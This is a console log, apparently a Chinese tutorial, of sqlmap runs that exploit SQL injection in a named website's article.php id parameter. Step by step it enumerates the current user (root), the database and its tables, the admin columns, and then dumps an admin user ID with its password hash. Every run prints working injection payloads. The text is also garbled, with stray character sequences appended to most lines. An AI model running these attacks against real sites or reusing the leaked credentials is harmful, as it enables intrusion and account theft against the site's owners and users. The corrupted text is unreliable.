D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ Q$ P$ |2 L" h8 b) h |ms "Mysql" --current-user /* 注解:获取当前用户名称: m2 A5 Y3 X. S" w0 g& _0 ~
sqlmap/0.9 - automatic SQL injection and database takeover tool
5 s4 @0 B# b; ^# k; i http://sqlmap.sourceforge.net starting at: 16:53:541 b$ A5 @$ u' h+ \
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as0 W: z% B4 @. a# y+ W B& J7 b
session file
) L }; w# S* U1 z5 h[16:53:54] [INFO] resuming injection data from session file1 s* G4 |) b, d7 o. o1 v
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file# ~; d0 W8 s8 `5 t
[16:53:54] [INFO] testing connection to the target url
0 l& Z7 o7 W" ?- k# |; usqlmap identified the following injection points with a total of 0 HTTP(s) reque; |5 p' y3 ?/ V1 Z
sts:% V1 B5 r) h/ R$ b0 \
---
3 ^/ ^: _9 S+ FPlace: GET" k+ z& ^6 S2 m
Parameter: id8 ~) E1 x6 [7 k. l& G( _: H# v
Type: boolean-based blind
% s( H- U, x) o8 E7 ] Title: AND boolean-based blind - WHERE or HAVING clause$ t/ J+ p! {; o* J2 V; d) G
Payload: id=276 AND 799=799% a3 z I9 a' s" i4 G
Type: error-based5 O: a$ B; ]" u# b: V, n
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' I3 p& E4 N- {5 j* \, l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 w& y8 i w" i- H$ j8 _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, R7 t2 u" D* U1 t& u& U
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); L9 a0 C# M; F: ]' U3 s& G) a: k
Type: UNION query" E9 Z8 X5 X. O5 d3 v6 ~% U3 \
Title: MySQL UNION query (NULL) - 1 to 10 columns. t8 B# q6 v8 F- V
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
Z7 o1 D+ ~0 j- W(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ n8 j! _& b0 J# GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: M U9 o( K6 h5 n* {# Z
Type: AND/OR time-based blind o6 m- j: C6 z2 u; f9 g! |- F# a, r
Title: MySQL > 5.0.11 AND time-based blind4 @# S1 J' h1 q
Payload: id=276 AND SLEEP(5)
C; o. G) r( R% @( i( w---1 Y6 F8 p$ r- e0 O4 q: [
[16:53:55] [INFO] the back-end DBMS is MySQL" l G1 b, b$ D$ _
web server operating system: Windows6 ?5 K5 q2 i% j; s3 X
web application technology: Apache 2.2.11, PHP 5.3.0
2 q0 L6 y% H. Dback-end DBMS: MySQL 5.0% s/ E9 y. n3 g$ M- N
[16:53:55] [INFO] fetching current user. U, m6 @+ M4 R9 H& a$ Q9 @
current user: 'root@localhost'
0 t) D8 S( v8 l9 b/ x/ B[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
2 ~4 A5 P4 @$ e8 ktput\www.wepost.com.hk' shutting down at: 16:53:589 j# x. G! z" t g6 z# S
& v3 V# ]2 a. l K! n2 d3 V! ?* m
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 B( {1 x8 O3 c- [( S* t# T
ms "Mysql" --current-db /*当前数据库
2 I$ t2 D; c, A( O# P! ] sqlmap/0.9 - automatic SQL injection and database takeover tool ~" H6 V% {: |" }
http://sqlmap.sourceforge.net starting at: 16:54:166 D6 ^4 x; m& J! C( B
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as$ x7 j, g3 x+ y+ Q
session file1 j1 j" t" a: r( C4 l
[16:54:16] [INFO] resuming injection data from session file
7 I# }9 ` Q6 C[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
8 L! `7 o% p& } b[16:54:16] [INFO] testing connection to the target url
) ~) ] |( d9 H& G6 v) D" h& {sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ P, |& b7 f# E# m. qsts:
; r9 ?7 v; t, g$ G( P B---
- V3 h8 x: t) JPlace: GET
/ [" W( _' q; x! W8 tParameter: id
% i' Z/ F. c3 y Type: boolean-based blind1 `3 n- n) z+ P
Title: AND boolean-based blind - WHERE or HAVING clause* |) c5 H/ U8 T, F" {0 g" f
Payload: id=276 AND 799=7997 h9 m4 [. k+ o4 K9 z0 S
Type: error-based
3 S; b) E, c" u& c; z1 A Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 ?% W5 X% q& F+ h0 f S4 Y& R& a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 j: h& K, p' j; w120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ w6 k& a9 s- ]- c),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" I* g9 e1 |2 I* @
Type: UNION query$ J- z/ i6 H' g$ W4 }
Title: MySQL UNION query (NULL) - 1 to 10 columns
3 @9 {5 S4 D# G3 A Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* N$ X* W, E4 M) p' J- z. g
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* K2 {! E. ~" e3 j$ K) o9 W/ UCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- ]+ T, m1 v- } b4 l
Type: AND/OR time-based blind% g' c/ `( U) E& H3 a( ~0 b. u
Title: MySQL > 5.0.11 AND time-based blind
/ c& j# C- K5 T! ? Payload: id=276 AND SLEEP(5)% l2 K$ s8 P* C! q) e
---; H$ X" D* Y! u/ [# u- L
[16:54:17] [INFO] the back-end DBMS is MySQL
* s6 w9 q$ V5 {2 R$ T* rweb server operating system: Windows
, n& t a! C3 ^9 G! a8 {web application technology: Apache 2.2.11, PHP 5.3.0
% O1 @ q! n* g5 @. lback-end DBMS: MySQL 5.0) C; n G6 g$ V" g0 c# e ]1 O+ M4 K
[16:54:17] [INFO] fetching current database2 g" Z8 D) M$ |7 Q
current database: 'wepost'
; X' V1 H3 D( G* k. @1 G[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou3 ~; {# h+ T+ J. l. h/ f
tput\www.wepost.com.hk' shutting down at: 16:54:188 ]$ R0 y* Z6 u0 w" d
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 q( G" q% M' E: S1 C4 x. l
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
5 C6 s2 ]9 j! O' _: C sqlmap/0.9 - automatic SQL injection and database takeover tool/ a4 f" p: I) n8 }! ?
http://sqlmap.sourceforge.net starting at: 16:55:25
7 |4 d3 K2 r9 M* G# K[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: n( Z0 T/ K- @' i7 V session file
2 w2 }* S: f. G: M% u[16:55:25] [INFO] resuming injection data from session file0 q2 I# B/ l8 H$ D9 c2 g
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; d, j9 Q) k. d. k7 C
[16:55:25] [INFO] testing connection to the target url& e3 {+ _! c w! }" O" _( @* c2 {; {
sqlmap identified the following injection points with a total of 0 HTTP(s) reque9 j5 }) U( p! `" l- D% _5 c$ G
sts:
N, ]+ Q5 V' s& f# ~5 d( L0 y---5 [, t" K, v3 ?$ `& E
Place: GET
9 t, [2 G2 W; @, K. C/ x( fParameter: id" o' n& G2 @! ?; w
Type: boolean-based blind
{5 y( {0 M4 |4 D- ?: j- m$ ? Title: AND boolean-based blind - WHERE or HAVING clause
8 r4 g" v6 d z% t6 Z3 ^ Payload: id=276 AND 799=7997 E" \+ @$ [8 S/ \
Type: error-based
' b V! l; `* S- c* R- u Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. @( s# `: f% b! A
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 o" P, i' N( M8 z
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 s; V/ c( P' }9 I) T
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! o) Y+ S# ^9 G* Y
Type: UNION query# R @$ i( b% \, h/ n
Title: MySQL UNION query (NULL) - 1 to 10 columns
$ U4 l/ a, m9 d% P$ C* a Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 ?1 ]* t1 l) a. O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. h! ^/ I7 b0 C" m) }1 dCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( g3 N ~ E) ?, y: Q% p1 L+ N3 n Type: AND/OR time-based blind) |" m a! j, i4 }: j2 G4 P0 h
Title: MySQL > 5.0.11 AND time-based blind
4 E) b( _/ U% P L/ a j3 q- t5 j, a) d Payload: id=276 AND SLEEP(5)
& N! A) L0 w: E" @---
9 S' e' X) w1 j8 ]6 ^[16:55:26] [INFO] the back-end DBMS is MySQL
" X" v. V; x$ h4 [; Z0 i2 e: Wweb server operating system: Windows" A- d: }. U, M8 W. f
web application technology: Apache 2.2.11, PHP 5.3.0
5 ?3 G) O7 ~3 A4 F9 E! q+ dback-end DBMS: MySQL 5.0( z( V( T ^, X% U) D2 f8 @
[16:55:26] [INFO] fetching tables for database 'wepost'
$ K! g" b+ E |- W& c* e[16:55:27] [INFO] the SQL query used returns 6 entries8 _) R8 h9 v; F0 C1 ~
Database: wepost3 _% f9 t7 p8 Z7 a* `& w" \
[6 tables]
4 Y l2 U4 c) J2 k1 t4 P+ @+-------------+7 d5 X4 g6 j( ]1 [6 U: A8 ?
| admin |
/ d1 V2 R. A; ~9 l* @| article |
6 ^! Z& ?8 D4 Q! T: _7 T+ V| contributor |3 v. l. K( q; u) s+ j' {
| idea |
7 q* L- c8 s: z5 t% X6 ^1 _8 h| image |% G' |2 v$ _1 @ |
| issue |4 Q' d# O5 f& M' V" ]
+-------------+
$ W. ]+ x1 |& g6 b3 d[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou f/ `9 u" \5 Q8 N2 f5 q: e( Y, z
tput\www.wepost.com.hk' shutting down at: 16:55:33
0 W# N% b7 ~: s# L* ?: G( p6 y* ~. Q& ?& S' k- u- N ]% k. N
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; T: _& Q# g, A- ]. G9 {) j/ P3 Q
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
. l& {/ Y* Q' J6 V5 D# }6 Q sqlmap/0.9 - automatic SQL injection and database takeover tool; d: B! C8 g. \7 K$ I
http://sqlmap.sourceforge.net starting at: 16:56:069 I8 |9 l% K5 ^' ^/ q. X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque7 |6 d% `: q9 o7 Z I. P" F9 l
sts: K. ~" P$ [/ e) I6 Z- R
---
9 d3 ~5 w6 J8 z2 T2 cPlace: GET
1 s( Q8 g- R L. RParameter: id
2 {& ~( l) c/ T `% Q: Z0 f Type: boolean-based blind
6 o+ H# }1 Y: s6 C( P/ H9 M, } Title: AND boolean-based blind - WHERE or HAVING clause
( R, T H$ W. d, } C4 g4 j Payload: id=276 AND 799=799. C. W+ B0 @; B( |
Type: error-based
y, z" c7 \( ?+ A# h# d Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
" N& r, m6 g3 b6 Y- G- V2 z Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( u- N6 O- t3 k; {( H
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 o0 }9 ]4 X; E# ` x. B) C: Q
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) M+ O9 z& R( s7 L
Type: UNION query- u4 y* b8 x$ z
Title: MySQL UNION query (NULL) - 1 to 10 columns
& d- Y$ ^2 z7 m& V: _3 t0 T Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- \- \' X5 d4 i4 o" I. |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
1 l. n$ Z; ?6 X5 R& J" i2 XCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ _# f b( k3 } z, J! ~. B( ^ Type: AND/OR time-based blind
$ M& b0 @0 [% T: P. ? Title: MySQL > 5.0.11 AND time-based blind
5 @ U& `2 Q6 l3 a/ e Payload: id=276 AND SLEEP(5); y9 m8 n1 Y; m0 c' s
---
( z2 h; D) ^, n; j8 Hweb server operating system: Windows
4 b$ s+ \6 D7 }0 Z0 i" E8 }" Q% U; Pweb application technology: Apache 2.2.11, PHP 5.3.0
3 j. z. R: q" e9 A$ L4 `" m. G, r0 jback-end DBMS: MySQL 5.01 [9 W$ m; [6 d5 H
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
% p# W- Q( o7 S* X* Assion': wepost, wepost" R9 x L1 u3 j; F6 p/ L
Database: wepost
" k: J/ ? |' G" r6 r, w$ N! wTable: admin! E4 u* K" K" y& N
[4 columns]
6 I$ t$ v' E$ v& y# C- u$ p1 D. o A+----------+-------------+
1 i. A7 R( D! S+ E1 ]| Column | Type |
( m' f1 Z- s+ K, M+----------+-------------+
/ Z' M9 y6 w5 V( s% w' e) a6 e| id | int(11) |
# R9 R- _7 w0 r. g C/ r2 E| password | varchar(32) |) q# D. `* y5 q5 X) v
| type | varchar(10) |) q# z" J" A1 q/ R3 v \: a9 `( m
| userid | varchar(20) |
2 S' R& s! n6 o' A+----------+-------------+
7 E7 x9 [ Q: g7 v5 J7 K7 H shutting down at: 16:56:190 u9 G8 \, {0 T, ~7 O
0 H9 ^/ J+ o9 U4 r5 X3 ?
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. K9 G- e- L8 u" W% V& i. `' Z
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
2 f% V& G0 b& b7 G sqlmap/0.9 - automatic SQL injection and database takeover tool$ l( ?: }% F5 ~
http://sqlmap.sourceforge.net starting at: 16:57:14$ u0 \; G0 W- R! b3 C
sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 w- R! {8 }& N2 |' E: k3 x: n
sts:
9 n8 g9 F; N- A- A" y0 z( F7 W9 o---, L. m+ a$ U: h5 A+ v' z+ r
Place: GET* T3 L' L$ ]% A* T
Parameter: id9 |& M+ v7 [" F3 B' H
Type: boolean-based blind! M l( O( }0 K3 {/ k, c
Title: AND boolean-based blind - WHERE or HAVING clause7 B" L3 R8 {0 {8 ]/ N, L, M" b
Payload: id=276 AND 799=799$ ]5 ]) ^5 R$ |0 A# W" p/ p
Type: error-based
( k, A; w6 ~/ }. Z. ] Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 P6 A: k3 |2 r; \+ T' `2 S. q( J$ R Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. F; Y; l% u2 B8 X' k7 L. |120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% |: c4 l* ]9 j
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 J! ^; Q0 F+ H, C- @5 n5 F' u
Type: UNION query* n" r7 {, E: F' ]% k, x) ]
Title: MySQL UNION query (NULL) - 1 to 10 columns- S, P2 c P5 ^7 n0 v$ a" o* c
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% j2 o! Q( y8 `9 a; a9 t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," L. o# s& ^6 }) `
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 M* i" P- Q, \) m
Type: AND/OR time-based blind- ]- @/ X5 ^" c
Title: MySQL > 5.0.11 AND time-based blind
( K! G" T3 _3 N+ l7 a4 O Payload: id=276 AND SLEEP(5)
- I$ |7 p2 P8 ^; E+ B" y---0 \) J: p7 V! }8 Y* U
web server operating system: Windows
7 V% k- Y4 J; z1 J* K1 Wweb application technology: Apache 2.2.11, PHP 5.3.0
+ D' Z% t+ |1 U$ i5 gback-end DBMS: MySQL 5.0
! x9 n U7 x. E, M2 Zrecognized possible password hash values. do you want to use dictionary attack o
x8 h/ L9 C- w+ Z+ J9 k3 I$ dn retrieved table items? [Y/n/q] y
5 \) t! i" `- r+ I* Hwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]) B, B- p0 U/ f$ K, f
do you want to use common password suffixes? (slow!) [y/N] y
6 Y$ c7 ?: f% ~7 C- `Database: wepost
) {+ S- W% P* |) O9 MTable: admin
/ P0 J: {5 z8 g; Z[1 entry]& o% \+ [2 h3 W* S* _
+----------------------------------+------------+
2 G- E, S# I6 a# A3 {# w| password | userid |/ y: @- x& _& A5 U8 z
+----------------------------------+------------+
! Q8 c5 w4 Q* R( I/ I| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |6 C7 m9 ], Y" o* H* i
+----------------------------------+------------+
8 n6 P; q( F' I; O) M, k" { shutting down at: 16:58:147 _7 x6 i7 C. i4 U: U
+ Z4 J5 f! p* xD:\Python27\sqlmap> |